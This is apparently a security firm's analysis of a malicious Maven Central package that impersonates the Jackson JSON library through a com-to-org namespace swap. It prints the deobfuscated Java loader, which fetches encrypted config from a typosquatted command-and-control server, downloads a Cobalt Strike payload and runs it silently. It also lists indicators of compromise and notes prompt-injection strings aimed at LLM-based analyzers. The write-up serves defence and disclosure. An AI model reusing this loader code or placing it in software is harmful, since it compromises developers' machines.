Today, our team identified a malicious package (org.fasterxml.jackson.core/jackson-databind) on Maven Central masquerading as a legitimate Jackson JSON library extension. It’s quite novel, and the first time we’ve detected rather sophisticated malware on Maven Central. Interestingly, this shift in focus to Maven comes as other ecosystems, like npm, are actively hardening their defenses. Because we’ve rarely seen attacks in this ecosystem, we wanted to document it so the larger community can come together and protect the ecosystem while this problem is still in its infancy.
The attackers have gone to great lengths to do a multi-staged payload, with encrypted configuration strings, a remote command-and-control server delivering platform-specific executables, and multiple layers of obfuscation designed to frustrate analysis. The typosquatting operates on two levels: the malicious package uses the org.fasterxml.jackson.core namespace, while the legitimate Jackson library is published under com.fasterxml.jackson.core. This mirrors the C2 domain: fasterxml.org versus the real fasterxml.com. The .com to .org swap is subtle enough to pass casual inspection but is entirely attacker-controlled.
At this time, we’ve reported the domain to GoDaddy, and the package to Maven Central. The package was taken down within 1.5 hours.
The malware at a glance
When we opened up the .jar file, we saw this mess:
Phew, what’s even going on here? I’m getting dizzy from just looking at it!
- It’s heavily obfuscated, as is evident.
- It contains attempts to trick LLM-based analyzers via new String() calls with prompt injection.
- When viewed in an editor that doesn’t escape Unicode characters, it shows a lot of noise.
But fear not, with a bit of help, we can deobfuscate it down to something far more readable:
package org.fasterxml.jackson.core; // FAKE PACKAGE - impersonates Jackson library
/**
* DEOBFUSCATED MALWARE
*
* True purpose: Trojan downloader / Remote Access Tool (RAT) loader
*
* This code masquerades as a legitimate Spring Boot auto-configuration
* for the Jackson JSON library, but actually:
* 1. Contacts a C2 server
* 2. Downloads and executes a malicious payload
* 3. Establishes persistence
*/
@Configuration
@ConditionalOnClass({ApplicationRunner.class})
public class JacksonSpringAutoConfiguration {
// ============ DECRYPTED CONSTANTS ============
// Encryption key (stored reversed as "SYEK_TLUAFED_FBO")
private static final String AES_KEY = "OBF_DEFAULT_KEYS";
// Secondary encryption key for payloads
private static final String PAYLOAD_DECRYPTION_KEY = "9237527890923496";
// Command & Control server URL (typosquatting fasterxml.com)
private static final String C2_CONFIG_URL = "http://m.fasterxml.org:51211/config.txt";
// Persistence marker file (disguised as IntelliJ IDEA file)
private static final String PERSISTENCE_FILE = ".idea.pid";
// Downloaded payload filename
private static final String PAYLOAD_FILENAME = "payload.bin";
// User-Agent for HTTP requests
private static final String USER_AGENT = "Mozilla/5.0";
// ============ MAIN MALWARE LOGIC ============
@Bean
public ApplicationRunner autoRunOnStartup() {
return args -> {
executeMalware();
};
}
private void executeMalware() {
// Step 1: Check if already running via persistence file
if (Files.exists(Paths.get(PERSISTENCE_FILE))) {
System.out.println("[Check] Running, skip");
return;
}
// Step 2: Detect operating system
String os = detectOperatingSystem();
// Step 3: Fetch payload configuration from C2 server
String config = fetchC2Configuration();
if (config == null) {
System.out.println("[Error] 未能获取到当前系统的 Payload 配置");
// Translation: "Failed to get current system's Payload configuration"
return;
}
System.out.println("[Network] 从 HTTP 每一行中匹配到配置");
// Translation: "Matched configuration from each HTTP line"
// Step 4: Download payload to temp directory
String tempDir = System.getProperty("java.io.tmpdir");
Path payloadPath = Paths.get(tempDir, PAYLOAD_FILENAME);
downloadPayload(config, payloadPath);
// Step 5: Make payload executable on Unix systems
if (os.equals("linux") || os.equals("mac")) {
ProcessBuilder chmod = new ProcessBuilder("chmod", "+x", payloadPath.toString());
chmod.start().waitFor();
}
// Step 6: Execute payload with output suppressed
executePayload(payloadPath, os);
// Step 7: Create persistence marker
Files.createFile(Paths.get(PERSISTENCE_FILE));
}
private String detectOperatingSystem() {
String osName = System.getProperty("os.name").toLowerCase();
if (osName.contains("win")) {
return "win";
} else if (osName.contains("mac") || osName.contains("darwin")) {
return "mac";
} else if (osName.contains("nux") || osName.contains("linux")) {
return "linux";
} else {
return "unknown";
}
}
private String fetchC2Configuration() {
try {
URL url = new URL(C2_CONFIG_URL);
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("GET");
conn.setRequestProperty("User-Agent", USER_AGENT);
if (conn.getResponseCode() == 200) {
BufferedReader reader = new BufferedReader(
new InputStreamReader(conn.getInputStream())
);
StringBuilder config = new StringBuilder();
String line;
while ((line = reader.readLine()) != null) {
config.append(line).append("\n");
}
return config.toString();
}
} catch (Exception e) {
// Silently fail
}
return null;
}
private void downloadPayload(String config, Path destination) {
try {
// Config format: "win|http://...\nmac|http://...\nlinux|http://..."
// Each line is AES-ECB encrypted with PAYLOAD_DECRYPTION_KEY
String os = detectOperatingSystem();
String payloadUrl = null;
// Parse each line of config to find matching OS
for (String encryptedLine : config.split("\n")) {
String line = decryptAES(encryptedLine.trim(), PAYLOAD_DECRYPTION_KEY);
// Line format: "os|url" (e.g., "win|http://103.127.243.82:8000/...")
String[] parts = line.split("\\|", 2);
if (parts.length == 2 && parts[0].equals(os)) {
payloadUrl = parts[1];
break;
}
}
if (payloadUrl == null) {
return;
}
// Download payload binary
URL url = new URL(payloadUrl);
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("GET");
conn.setRequestProperty("User-Agent", USER_AGENT);
if (conn.getResponseCode() == 200) {
try (InputStream in = conn.getInputStream()) {
Files.copy(in, destination, StandardCopyOption.REPLACE_EXISTING);
}
}
} catch (Exception e) {
// Silently fail
}
}
private String decryptAES(String hexEncrypted, String key) {
try {
// Convert hex string to bytes
byte[] encrypted = new byte[hexEncrypted.length() / 2];
for (int i = 0; i < encrypted.length; i++) {
encrypted[i] = (byte) Integer.parseInt(
hexEncrypted.substring(i * 2, i * 2 + 2), 16
);
}
SecretKeySpec secretKey = new SecretKeySpec(
key.getBytes(StandardCharsets.UTF_8), "AES"
);
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
cipher.init(Cipher.DECRYPT_MODE, secretKey);
byte[] decrypted = cipher.doFinal(encrypted);
return new String(decrypted, StandardCharsets.UTF_8);
} catch (Exception e) {
return "";
}
}
private void executePayload(Path payload, String os) {
try {
ProcessBuilder pb;
if (os.equals("win")) {
// Execute payload, redirect stderr/stdout to NUL
pb = new ProcessBuilder(payload.toString());
pb.redirectOutput(new File("NUL"));
pb.redirectError(new File("NUL"));
} else {
// Execute payload, redirect to /dev/null
pb = new ProcessBuilder(payload.toString());
pb.redirectOutput(new File("/dev/null"));
pb.redirectError(new File("/dev/null"));
}
pb.start();
} catch (Exception e) {
// Silently fail
}
}
private boolean isProcessRunning(String processName, String os) {
try {
Process p;
if (os.equals("win")) {
// tasklist /FI "IMAGENAME eq processName"
p = Runtime.getRuntime().exec(new String[]{"tasklist", "/FI",
"IMAGENAME eq " + processName});
} else {
// ps -p <pid>
p = Runtime.getRuntime().exec(new String[]{"ps", "-p", processName});
}
return p.waitFor() == 0;
} catch (Exception e) {
return false;
}
}
// ============ STRING DECRYPTION ============
/**
* Decrypts obfuscated strings
* Algorithm:
* 1. Reverse the key
* 2. Reverse the encrypted string
* 3. Base64 decode
* 4. AES/ECB decrypt
*/
private static String decrypt(String encrypted, String key) {
try {
String reversedKey = new StringBuilder(key).reverse().toString();
String reversedEncrypted = new StringBuilder(encrypted).reverse().toString();
byte[] decoded = Base64.getDecoder().decode(reversedEncrypted);
SecretKeySpec secretKey = new SecretKeySpec(
reversedKey.getBytes(StandardCharsets.UTF_8), "AES"
);
Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
cipher.init(Cipher.DECRYPT_MODE, secretKey);
byte[] decrypted = cipher.doFinal(decoded);
return new String(decrypted, StandardCharsets.UTF_8);
} catch (Exception e) {
return "";
}
}
}
Malware flow
Here’s an overview of how the malware runs:
Stage 0: Infection. A developer adds the malicious dependency to their pom.xml, believing it to be a legitimate Jackson extension. The package uses the org.fasterxml.jackson.core namespace, the same as the real Jackson library, to appear trustworthy.
Stage 1: Auto-execution. When the Spring Boot application starts, Spring scans for @Configuration classes and finds JacksonSpringAutoConfiguration. The @ConditionalOnClass({ApplicationRunner.class}) check passes (ApplicationRunner is always present in Spring Boot), so Spring registers the class as a bean. The malware's ApplicationRunner is invoked automatically after the application context loads. No explicit calls required.
Stage 2: Persistence check. The malware looks for a file named .idea.pid in the working directory. This filename is deliberately chosen to blend in with IntelliJ IDEA project files. If the file exists, the malware assumes it's already running and exits silently.
Stage 3: Environment fingerprinting. The malware detects the operating system by checking System.getProperty("os.name") and matching against win, mac/darwin, and nux/linux.
Stage 4: C2 contact. The malware reaches out to http://m.fasterxml[.]org:51211/config.txt, a typosquatted domain mimicking the legitimate fasterxml.com. The response contains AES-encrypted lines, one per supported platform.
Stage 5: Payload delivery. Each line in the config is decrypted using AES-ECB with a hardcoded key (9237527890923496). The format is os|url, for example these values that we found when reversing the malware:
win|http://103.127.243[.]82:8000/http/192he23/svchosts.exe
mac|http://103.127.243[.]82:8000/http/192he23/update
The malware selects the URL matching the detected OS and downloads the binary to the system temp directory as payload.bin.
Stage 6: Execution. On Unix systems, the malware runs chmod +x on the payload. It then executes the binary with stdout/stderr redirected to /dev/null (Unix) or NUL (Windows) to suppress any output. The Windows payload is named svchosts.exe, a deliberate typosquat of the legitimate svchost.exe process.
Stage 7: Persistence. Finally, the malware creates the .idea.pid marker file to prevent re-execution on subsequent application restarts.
The domain
The typosquatted domain fasterxml.org was registered on December 17th, 2025, just 8 days before our analysis. WHOIS records show it was registered through GoDaddy and updated on December 22nd, suggesting active development of the malicious infrastructure in the days leading up to deployment.
The short gap between domain registration and active use is a common pattern in malware campaigns: attackers spin up infrastructure shortly before deployment to minimize the window for detection and blocklisting. The legitimate Jackson library has operated at fasterxml.com for over a decade, making the .org variant a low-effort, high-reward impersonation.
The binaries
We retrieved the binaries, and submitted them to VirusTotal for analysis:
Linux/Mac - 702161756dfd150ad3c214fbf97ce98fdc960ea7b3970b5300702ed8c953cafd
Windows - 8bce95ebfb895537fec243e069d7193980361de9d916339906b11a14ffded94f
The Linux/macOS payload is consistently identified as a Cobalt Strike beacon across virtually all detecting vendors. Cobalt Strike is a commercial penetration testing tool that provides full command-and-control capabilities: remote access, credential harvesting, lateral movement, and payload deployment. While designed for legitimate red team use, leaked versions have made it a favorite of ransomware operators and APT groups. Its presence typically signals sophisticated adversaries with intentions beyond simple cryptomining.
Opportunities for Maven Central to protect the ecosystem
This attack highlights an opportunity to strengthen how package registries handle namespace squatting. Other ecosystems have already taken some steps to tackle this problem, and Maven Central could benefit from similar defenses.
The prefix swap problem: This attack exploited a specific blind spot: TLD-style prefix swaps in Java's reverse-domain namespace convention. The legitimate Jackson library uses com.fasterxml.jackson.core, while the malicious package used org.fasterxml.jackson.core. This is directly analogous to domain typosquatting (fasterxml.com vs fasterxml.org), but Maven Central appear to currently have no mechanism to detect it.
This is a simple attack, and we expect copycats. The technique demonstrated here: swapping com. for org. in a popular library's namespace. This requires minimal sophistication. Now that this approach has been documented, we anticipate other attackers will attempt similar prefix swaps against other high-value libraries. The window to implement defenses is now, before this becomes a widespread pattern.
Given the simplicity and effectiveness of this prefix swap attack, we would urge Maven Central to consider implementing:
- Prefix similarity detection. When a new package is published under
org.example, check ifcom.exampleornet.examplealready exists with significant download volume. If so, flag for review. The same logic should apply in reverse and across all common TLDs (`com, org, net, io, dev`). - Popular package protection. Maintain a list of high-value namespaces (like
com.fasterxml,com.google,org.apache) and require additional verification for any package published under similar-looking namespaces.
We share this analysis in the spirit of collaboration. The Java ecosystem has been a relatively safe haven from the supply chain attacks that have plagued npm and PyPI in recent years. Proactive measures now can help keep it that way.
IOCs
Domains:
fasterxml[.]orgm.fasterxml[.]org
IP Addresses:
103.127.243[.]82
URLs:
http://m.fasterxml[.]org:51211/config.txthttp://103.127.243[.]82:8000/http/192he23/svchosts.exehttp://103.127.243[.]82:8000/http/192he23/update
Binaries:
- Windows payload (svchosts.exe):
8bce95ebfb895537fec243e069d7193980361de9d916339906b11a14ffded94f - macOS payload (update):
702161756dfd150ad3c214fbf97ce98fdc960ea7b3970b5300702ed8c953cafd
Secure your software now
.avif)
